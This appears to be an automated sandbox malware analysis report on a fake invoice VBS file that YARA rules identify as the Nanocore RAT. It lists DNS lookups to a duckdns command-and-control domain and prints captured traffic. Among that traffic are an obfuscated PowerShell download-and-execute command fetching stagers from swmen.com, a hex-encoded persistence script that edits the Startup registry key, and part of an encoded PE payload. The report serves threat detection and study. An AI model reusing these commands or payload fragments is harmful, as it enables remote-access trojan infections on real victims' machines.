                            Jan 14, 2022 13:39:08.576349020 CET6115053192.168.2.58.8.8.8
                            Jan 14, 2022 13:39:08.596019983 CET53611508.8.8.8192.168.2.5
                            Jan 14, 2022 13:39:14.990700006 CET5042253192.168.2.58.8.8.8
                            Jan 14, 2022 13:39:15.097235918 CET53504228.8.8.8192.168.2.5
                            Jan 14, 2022 13:39:21.949111938 CET5324753192.168.2.58.8.8.8
                            Jan 14, 2022 13:39:22.058551073 CET53532478.8.8.8192.168.2.5

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Jan 14, 2022 13:35:22.954824924 CET192.168.2.58.8.8.80x511eStandard query (0)swmen.comA (IP address)IN (0x0001)
                            Jan 14, 2022 13:35:35.157130003 CET192.168.2.58.8.8.80xc06fStandard query (0)swmen.comA (IP address)IN (0x0001)
                            Jan 14, 2022 13:35:48.863003969 CET192.168.2.58.8.8.80x2e8bStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:35:56.449099064 CET192.168.2.58.8.8.80x4e22Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:01.414809942 CET192.168.2.58.8.8.80x6fbaStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:08.967614889 CET192.168.2.58.8.8.80xd15Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:16.610224009 CET192.168.2.58.8.8.80x8081Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:23.620286942 CET192.168.2.58.8.8.80xb027Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:30.824541092 CET192.168.2.58.8.8.80xfbf2Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:37.462938070 CET192.168.2.58.8.8.80xf722Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:44.660028934 CET192.168.2.58.8.8.80x9a33Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:51.641803980 CET192.168.2.58.8.8.80x33b7Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:58.753150940 CET192.168.2.58.8.8.80x73a3Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:05.769159079 CET192.168.2.58.8.8.80x89a2Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:13.006488085 CET192.168.2.58.8.8.80x3b0bStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:19.104607105 CET192.168.2.58.8.8.80xc043Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:26.175501108 CET192.168.2.58.8.8.80x87a3Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:33.239128113 CET192.168.2.58.8.8.80xeb5bStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:40.263706923 CET192.168.2.58.8.8.80x1c28Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:47.328888893 CET192.168.2.58.8.8.80x8a14Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:53.511174917 CET192.168.2.58.8.8.80xb016Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:59.693948984 CET192.168.2.58.8.8.80x5875Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:06.885039091 CET192.168.2.58.8.8.80xcef3Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:13.906923056 CET192.168.2.58.8.8.80xd20eStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:20.863589048 CET192.168.2.58.8.8.80xc55fStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:27.066282034 CET192.168.2.58.8.8.80xef2dStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:34.126144886 CET192.168.2.58.8.8.80x2520Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:41.258670092 CET192.168.2.58.8.8.80x29fdStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:46.333275080 CET192.168.2.58.8.8.80x7931Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:53.320635080 CET192.168.2.58.8.8.80x2042Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:01.465456963 CET192.168.2.58.8.8.80x129eStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:08.576349020 CET192.168.2.58.8.8.80x3907Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:14.990700006 CET192.168.2.58.8.8.80xa2ffStandard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:21.949111938 CET192.168.2.58.8.8.80x6174Standard query (0)testalienscy9090.duckdns.orgA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Jan 14, 2022 13:35:22.984945059 CET8.8.8.8192.168.2.50x511eNo error (0)swmen.com107.180.25.2A (IP address)IN (0x0001)
                            Jan 14, 2022 13:35:35.176605940 CET8.8.8.8192.168.2.50xc06fNo error (0)swmen.com107.180.25.2A (IP address)IN (0x0001)
                            Jan 14, 2022 13:35:48.969105959 CET8.8.8.8192.168.2.50x2e8bNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:35:56.554811001 CET8.8.8.8192.168.2.50x4e22No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:01.522263050 CET8.8.8.8192.168.2.50x6fbaNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:09.074172974 CET8.8.8.8192.168.2.50xd15No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:16.719033957 CET8.8.8.8192.168.2.50x8081No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:23.726896048 CET8.8.8.8192.168.2.50xb027No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:30.842407942 CET8.8.8.8192.168.2.50xfbf2No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:37.482007980 CET8.8.8.8192.168.2.50xf722No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:44.679258108 CET8.8.8.8192.168.2.50x9a33No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:51.661067963 CET8.8.8.8192.168.2.50x33b7No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:36:58.772578955 CET8.8.8.8192.168.2.50x73a3No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:05.786828995 CET8.8.8.8192.168.2.50x89a2No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:13.112488031 CET8.8.8.8192.168.2.50x3b0bNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:19.126012087 CET8.8.8.8192.168.2.50xc043No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:26.283379078 CET8.8.8.8192.168.2.50x87a3No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:33.347579002 CET8.8.8.8192.168.2.50xeb5bNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:40.283207893 CET8.8.8.8192.168.2.50x1c28No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:47.346383095 CET8.8.8.8192.168.2.50x8a14No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:53.528637886 CET8.8.8.8192.168.2.50xb016No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:37:59.713011980 CET8.8.8.8192.168.2.50x5875No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:06.991189003 CET8.8.8.8192.168.2.50xcef3No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:13.926369905 CET8.8.8.8192.168.2.50xd20eNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:20.973520041 CET8.8.8.8192.168.2.50xc55fNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:27.085701942 CET8.8.8.8192.168.2.50xef2dNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:34.145984888 CET8.8.8.8192.168.2.50x2520No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:41.368139029 CET8.8.8.8192.168.2.50x29fdNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:46.352648973 CET8.8.8.8192.168.2.50x7931No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:38:53.429656029 CET8.8.8.8192.168.2.50x2042No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:01.484771013 CET8.8.8.8192.168.2.50x129eNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:08.596019983 CET8.8.8.8192.168.2.50x3907No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:15.097235918 CET8.8.8.8192.168.2.50xa2ffNo error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)
                            Jan 14, 2022 13:39:22.058551073 CET8.8.8.8192.168.2.50x6174No error (0)testalienscy9090.duckdns.org185.140.53.10A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • swmen.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.549752107.180.25.280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampkBytes transferredDirectionData
                            Jan 14, 2022 13:35:23.114211082 CET1044OUTGET /ben/PS1vedy.txt HTTP/1.1
                            Host: swmen.com
                            Connection: Keep-Alive
                            Jan 14, 2022 13:35:23.255115032 CET1046INHTTP/1.1 200 OK
                            Date: Fri, 14 Jan 2022 12:35:23 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade, Keep-Alive
                            Last-Modified: Fri, 14 Jan 2022 11:54:54 GMT
                            ETag: "a940184-14b0-5d589789efccf"
                            Accept-Ranges: bytes
                            Content-Length: 5296
                            Vary: Accept-Encoding
                            Keep-Alive: timeout=5
                            Content-Type: text/plain
                            Data Raw: 24 48 48 78 48 48 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 35 31 39 37 33 34 39 32 37 39 34 31 35 32 38 37 39 37 35 39 33 39 22 0d 0a 24 48 48 48 78 48 48 48 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 35 31 39 37 33 34 39 32 37 39 34 31 35 32 38 37 39 37 35 39 33 39 22 0d 0a 24 68 65 78 53 74 72 69 6e 67 20 3d 20 22 35 62 20 37 33 20 37 39 20 37 33 20 37 34 20 36 35 20 36 64 20 32 65 20 36 39 20 36 66 20 32 65 20 36 34 20 36 39 20 37 32 20 36 35 20 36 33 20 37 34 20 36 66 20 37 32 20 37 39 20 35 64 20 33 61 20 33 61 20 34 33 20 37 32 20 36 35 20 36 31 20 37 34 20 36 35 20 34 34 20 36 39 20 37 32 20 36 35 20 36 33 20 37 34 20 36 66 20 37 32 20 37 39 20 32 38 20 32 34 20 34 38 20 34 38 20 37 38 20 34 38 20 34 38 20 32 39 20 30 61 20 37 33 20 37 34 20 36 31 20 37 32 20 37 34 20 32 64 20 37 33 20 36 63 20 36 35 20 36 35 20 37 30 20 32 30 20 32 64 20 37 33 20 32 30 20 33 35 20 30 61 20 35 33 20 36 35 20 37 34 20 32 64 20 34 39 20 37 34 20 36 35 20 36 64 20 35 30 20 37 32 20 36 66 20 37 30 20 36 35 20 37 32 20 37 34 20 37 39 20 32 30 20 32 64 20 35 30 20 36 31 20 37 34 20 36 38 20 32 30 20 32 32 20 34 38 20 34 62 20 34 33 20 35 35 20 33 61 20 35 63 20 35 33 20 36 66 20 36 36 20 37 34 20 37 37 20 36 31 20 37 32 20 36 35 20 35 63 20 34 64 20 36 39 20 36 33 20 37 32 20 36 66 20 37 33 20 36 66 20 36 36 20 37 34 20 35 63 20 35 37 20 36 39 20 36 65 20 36 34 20 36 66 20 37 37 20 37 33 20 35 63 20 34 33 20 37 35 20 37 32 20 37 32 20 36 35 20 36 65 20 37 34 20 35 36 20 36 35 20 37 32 20 37 33 20 36 39 20 36 66 20 36 65 20 35 63 20 34 35 20 37 38 20 37 30 20 36 63 20 36 66 20 37 32 20 36 35 20 37 32 20 35 63 20 35 35 20 37 33 20 36 35 20 37 32 20 32 30 20 35 33 20 36 38 20 36 35 20 36 63 20 36 63 20 32 30 20 34 36 20 36 66 20 36 63 20 36 34 20 36 35 20 37 32 20 37 33 20 32 32 20 32 30 20 32 64 20 34 65 20 36 31 20 36 64 20 36 35 20 32 30 20 32 32 20 35 33 20 37 34 20 36 31 20 37 32 20 37 34 20 37 35 20 37 30 20 32 32 20 32 30 20 32 64 20 35 36 20 36 31 20 36 63 20 37 35 20 36 35 20 32 30 20 32 34 20 34 38 20 34 38 20 34 38 20 37 38 20 34 38 20 34 38 20 34 38 20 33 62 22 0d 0a 24 61 73 63 69 69 43 68 61 72 73 20 3d 20 24 68 65 78 53 74 72 69 6e 67 20 2d 73 70 6c 69 74 20 27 20 27 20 7c 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 5b 63 68 61 72 5d 5b 62 79 74 65 5d 22 30 78 24 5f 22 7d 0d 0a 24 61 73 63 69 69 53 74 72 69 6e 67 20 3d 20 24 61 73 63 69 69 43 68 61 72 73 20 2d 6a 6f 69 6e 20 27 27 0d 0a 69 65 78 20 24 61 73 63 69 69 53 74 72 69 6e 67 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 33 0d 0a 24 46 46 46 20 3d 20 40 27 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 6a 61 76 61 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 25 32 32 56 42 53 63 72 69 70 74 25 32 32 25 33 45 25 30 41 46 75 6e 63 74 69 6f 6e 25 32 30 76 61 72 5f 66 75 6e 63 25 32 38 25 32 39 25 30 41 48 42 25 32 30 25 33 44 25 32 30 72 65 70 6c 61 63 65 25 32 38 25 32 32 70 6f 77
                            Data Ascii: $HHxHH = "C:\ProgramData\5197349279415287975939"$HHHxHHH = "C:\ProgramData\5197349279415287975939"$hexString = "5b 73 79 73 74 65 6d 2e 69 6f 2e 64 69 72 65 63 74 6f 72 79 5d 3a 3a 43 72 65 61 74 65 44 69 72 65 63 74 6f 72 79 28 24 48 48 78 48 48 29 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 35 0a 53 65 74 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 45 78 70 6c 6f 72 65 72 5c 55 73 65 72 20 53 68 65 6c 6c 20 46 6f 6c 64 65 72 73 22 20 2d 4e 61 6d 65 20 22 53 74 61 72 74 75 70 22 20 2d 56 61 6c 75 65 20 24 48 48 48 78 48 48 48 3b"$asciiChars = $hexString -split ' ' |ForEach-Object {[char][byte]"0x$_"}$asciiString = $asciiChars -join ''iex $asciiStringstart-sleep -s 3$FFF = @'<script language=javascript>document.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0AHB%20%3D%20replace%28%22pow


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            1192.168.2.549761107.180.25.280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            TimestampkBytes transferredDirectionData
                            Jan 14, 2022 13:35:35.291266918 CET1375OUTGET /ben/ServerATEVN.txt HTTP/1.1
                            Host: swmen.com
                            Jan 14, 2022 13:35:35.426389933 CET1377INHTTP/1.1 200 OK
                            Date: Fri, 14 Jan 2022 12:35:35 GMT
                            Server: Apache
                            Upgrade: h2,h2c
                            Connection: Upgrade
                            Last-Modified: Fri, 14 Jan 2022 11:52:37 GMT
                            ETag: "a94002c-78c1e-5d58970709fae"
                            Accept-Ranges: bytes
                            Content-Length: 494622
                            Vary: Accept-Encoding
                            Content-Type: text/plain
                            Data Raw: 24 48 48 31 20 3d 20 27 34 44 35 41 39 3a 3a 3a 3a 33 3a 3a 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 3a 46 46 46 46 3a 3a 3a 3a 42 38 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 38 3a 3a 3a 3a 3a 3a 3a 3a 45 31 46 42 41 3a 45 3a 3a 42 34 3a 39 43 44 32 31 42 38 3a 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 3a 37 3a 37 32 36 46 36 37 37 32 36 31 36 44 32 3a 36 33 36 31 36 45 36 45 36 46 37 34 32 3a 36 32 36 35 32 3a 37 32 37 35 36 45 32 3a 36 39 36 45 32 3a 34 34 34 46 35 33 32 3a 36 44 36 46 36 34 36 35 32 45 3a 44 3a 44 3a 41 32 34 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 35 3a 34 35 3a 3a 3a 3a 34 43 3a 31 3a 33 3a 3a 41 31 32 37 45 39 35 34 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 45 3a 3a 3a 3a 45 3a 31 3a 42 3a 31 3a 36 3a 3a 3a 3a 43 38 3a 31 3a 3a 3a 3a 36 3a 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 39 32 45 37 3a 31 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 38 3a 3a 33 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 31 3a 3a 3a 3a 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 31 3a 3a 3a 3a 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 33 38 45 37 3a 31 3a 3a 35 37 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 32 3a 3a 39 3a 35 44 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 43 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 38 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 38 32 3a 3a 3a 3a 3a 34 38 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 45 37 34 36 35 37 38 37 34 3a 3a 3a 3a 3a 3a 39 38 43 37 3a 31 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 3a 43 38 3a 31 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 36 3a 32 45 37 32 36 35 36 43 36 46 36 33 3a 3a 3a 3a 3a 43 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 32 3a 3a 3a 3a 3a 3a 43 41 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 34 32 32 45 37 32 37 33 37 32 36 33 3a 3a 3a 3a 3a 3a 39 3a 35 44 3a 31 3a 3a 3a 3a 32 3a 3a 32 3a 3a 3a 3a 35 45 3a 31 3a 3a 3a 3a 43 43 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 34 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 37 34 45 37 3a 31 3a 3a 3a 3a 3a 3a 3a 3a 3a 3a 34 38
                            Data Ascii: $HH1 = '4D5A9::::3:::::::4::::::FFFF::::B8::::::::::::::4:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::8::::::::E1FBA:E::B4:9CD21B8:14CCD21546869732:7:726F6772616D2:63616E6E6F742:62652:72756E2:696E2:444F532:6D6F64652E:D:D:A24::::::::::::::5:45::::4C:1:3::A127E954::::::::::::::::E::::E:1:B:1:6::::C8:1::::6::1::::::::::92E7:1::::2::::::::::2::::::4:::::2::::::::2:::::4:::::::::::::::4::::::::::::::::8::3:::::2:::::::::::::2::::::::::1:::::1:::::::::1:::::1:::::::::::::1:::::::::::::::::::::::38E7:1::57::::::::2::2::9:5D:1:::::::::::::::::::::::::::::::::::::::2:::C::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::2::::::8:::::::::::::::::::::::82:::::48::::::::::::::::::::::2E74657874::::::98C7:1::::2:::::::C8:1:::::2::::::::::::::::::::::::::::2:::::6:2E72656C6F63:::::C:::::::::::2:::::2::::::CA:1::::::::::::::::::::::::::4:::::422E72737263::::::9:5D:1::::2::2::::5E:1::::CC:1::::::::::::::::::::::::::4:::::4:::::::::::::::::::::::::::::::::74E7:1::::::::::48


                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:13:35:18
                            Start date:14/01/2022
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\G2M18C6INV0ICERECEIPT.vbs"
                            Imagebase:0x7ff6c5520000
                            File size:163840 bytes
                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:13:35:19
                            Start date:14/01/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
                            Imagebase:0x7ff617cb0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Yara matches:
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, Author: Florian Roth
                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                            Reputation:high

                            General

                            Start time:13:35:20
                            Start date:14/01/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7ecfc0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:13:35:42
                            Start date:14/01/2022
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0xe0000
                            File size:55400 bytes
                            MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            General

                            Start time:13:35:43
                            Start date:14/01/2022
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                            Imagebase:0x740000
                            File size:55400 bytes
